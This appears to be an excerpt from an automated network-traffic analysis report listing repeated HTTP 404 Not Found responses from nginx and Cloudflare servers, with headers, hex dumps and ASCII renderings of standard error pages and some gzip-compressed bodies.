6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 10:05:08 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 10:05:11 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 10:05:14 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 10:05:17 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 10:05:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vyno%2FtlrtBdtwlwHZ0mQm%2F%2BFigSviIzUzyn03CZMXY6vHPtLbb%2FMEcfqhrKBS%2FMETX6jOfCIclP5CH%2BMsr1Ulb0eJL2MMC4kI%2B%2FlRR9NVaVv3UkNGxA4NOZK8B2N4n9TE8jdGHhiPOqP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930a9ffe9ed853db-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=106162&min_rtt=106162&rtt_var=53081&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=731&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 10:05:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SNqAFvO8gj5vPRZ0ZDwxA20XQv%2Bwu%2Fppq2m3py0AW0lxFuVbMeoTepgOCPXt6yokwYUYgZgR6ui6TunLXY16PeYQvBV4sqid28YW5i1Slippxva8iVRBKgCnipmYKaE7XIvdbetJ1dwt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930aa00f2d33afc5-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=106140&min_rtt=106140&rtt_var=53070&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=755&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 10:05:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=errDauCexMWMi0CcSVegaVGDkjCizxxPyTUUVFk3BdJaPRqAxmpdMBuJ1CcG0Q4BZ5jh9s2QrXgYOpGRdcHJw4EhLYIg0c5qriMle1OU8A1nqkG9yCvx7t4npL3h4Ljcx1tsbdz9rdrA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930aa01fc81dbad7-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=106131&min_rtt=106131&rtt_var=53065&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=915&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 10:05:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j7uUuml3m1JWY2spr182jFBH6lDVc2xL5aDOMKfYZfE6aZAi5oeYilzFtNWLQscVa01S8m32fBGGIXm7KQDAP4bx2GMDleAEx7yuhhKBZld4z%2F2%2Fp55Ff9qWc2Z%2FIsAGjILdI0q5huQ6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930aa0305c33bd1c-ATLalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=107929&min_rtt=107929&rtt_var=53964&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=462&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome frien
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 10:06:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privatecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yclu2m35PcVJvVIzn3bDXSWbLM89HzrR84OvvFEQwhpEhFv4PKupl4SLW3hIuiWTudASsx2AT9GWBGl8qZg49u5tO2WULCGMeK1c7WRooimX7%2BU81Xp9To%2BwYwyYBYrUtY29"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930aa10e5d9cb023-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=106115&min_rtt=106115&rtt_var=53057&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=713&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 38 32 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 59 5f 8f e3 b6 11 7f bf 4f c1 38 38 60 7d 20 b5 94 6c d9 3e 79 77 91 f4 9a a0 01 72 d7 a2 97 3e 04 4d 1f 68 69 64 33 2b 91 02 45 ff d9 53 f4 dd 0b 92 92 2c d9 5e ef 1e 90 be d5 8b 85 c5 99 e1 6f 46 43 72 38 33 be fb e6 af 7f ff f0 cb af ff f8 01 6d 74 9e 3d bc b9 33 5f 28 63 62 7d 3f 02 31 7a 78 83 10 42 77 1b 60 89 7b b4 c3 1c 34 43 f1 86 a9 12 f4 fd 68 ab 53 b2 18 9d b2 05 cb e1 7e b4 e3 b0 2f a4 d2 23 14 4b a1 41 e8 fb d1 9e 27 7a 73 9f c0 8e c7 40 ec 00 23 2e b8 e6 2c 23 65 cc 32 b8 f7 47 0f 6f 8e 68 9a eb 0c 1e 3e 49 8d 7e 94 5b 91 dc dd 3a 42 4f a2 d4 4f 86 80 7a 9f db 77 df 20 21 55 ce 32 fe 05 bc b8 2c d1 6e e1 51 cf 47 7f a0 8f 3f fd 82 7e e6 31 88 12 d0 1f 68 cd f5 66 bb f2 62 99 df 0a 88 65 c6 ca db e1 bc 77 b7 c6 23 55 c6 05 90 0d f0 f5 46 47 be e7 87 4b b2 87 d5 23 d7 44 c3 41 93 92 7f 01 c2 92 df b7 a5 8e 7c 4a df d6 2b 99 3c 55 39 53 6b 2e 22 5a b3 6a c5 e2 c7 b5 32 f6 93 58 66 52 45 5a 31 51 16 4c 81 d0 75 2c 13 a8 52 29 34 49 59 ce b3 a7 28 97 42 96 05 8b 01 77 4f 4b cb 37 7a 22 1f f2 fa df 1b 9e 24 20 fe 53 25 bc 2c 32 f6 14 09 29 a0 b6 96 f6 81 ca a7 52 43 4e b6 1c 13 56 14 19 10 47 c0 7f c9 b8 78 fc c8 e2 cf 76 f8 a3 14 1a 7f 86 b5 04 f4 af 9f f0 3f e5 4a 6a 89 ff 06 d9 0e 34 8f 19 fa 04 5b c0 df 2b ce 32 fc 49 6a 89 3e 33 51 e2 92 89 92 94 a0 78 8a bf 37 c8 e8 83 79 2d f4 43 2e 7f e7 1d d6 e9 f0 f3 53 be 92 0d 4a 4f 7e 39 74 6e 58 bf c3 11 4b 35 28 1c ad 20 95 0a aa 95 3c 98 77 e7 62 Data Ascii: 82cY_O88`} l>ywr>Mhid3+ES,^oFCr83mt=3_(cb}?1zxBw`{4ChS~/#KA'zs@#.,#e2Goh>I~[:BOOzw !U2,nQG?~1hfbew#UFGK#DA\|J+<U9Sk."Zj2XfREZ1QLu,R)4IY(BwOK7z"$ S%,2)RCNVGxv?Jj4[+2Ij>3Qx7y-C.SJO~9tnXK5( <wb
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 10:06:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privatecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2By3v2blJtD6ye8nrnsuMj%2F4eoSM2aoWbl%2BmAfq76Ie2gjKTid%2BZZfCxwc14lp%2FOwhza3ba3SUJr6FiXz5KAaTBmkh0WjfZjeHyHw5uqg26P03i7AOVJVW8hLrc1zGrzMhyzE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930aa11efee553af-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=106131&min_rtt=106131&rtt_var=53065&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=737&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 38 32 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 59 5f 8f e3 b6 11 7f bf 4f c1 38 38 60 7d 20 b5 94 6c d9 3e 79 77 91 f4 9a a0 01 72 d7 a2 97 3e 04 4d 1f 68 69 64 33 2b 91 02 45 ff d9 53 f4 dd 0b 92 92 2c d9 5e ef 1e 90 be d5 8b 85 c5 99 e1 6f 46 43 72 38 33 be fb e6 af 7f ff f0 cb af ff f8 01 6d 74 9e 3d bc b9 33 5f 28 63 62 7d 3f 02 31 7a 78 83 10 42 77 1b 60 89 7b b4 c3 1c 34 43 f1 86 a9 12 f4 fd 68 ab 53 b2 18 9d b2 05 cb e1 7e b4 e3 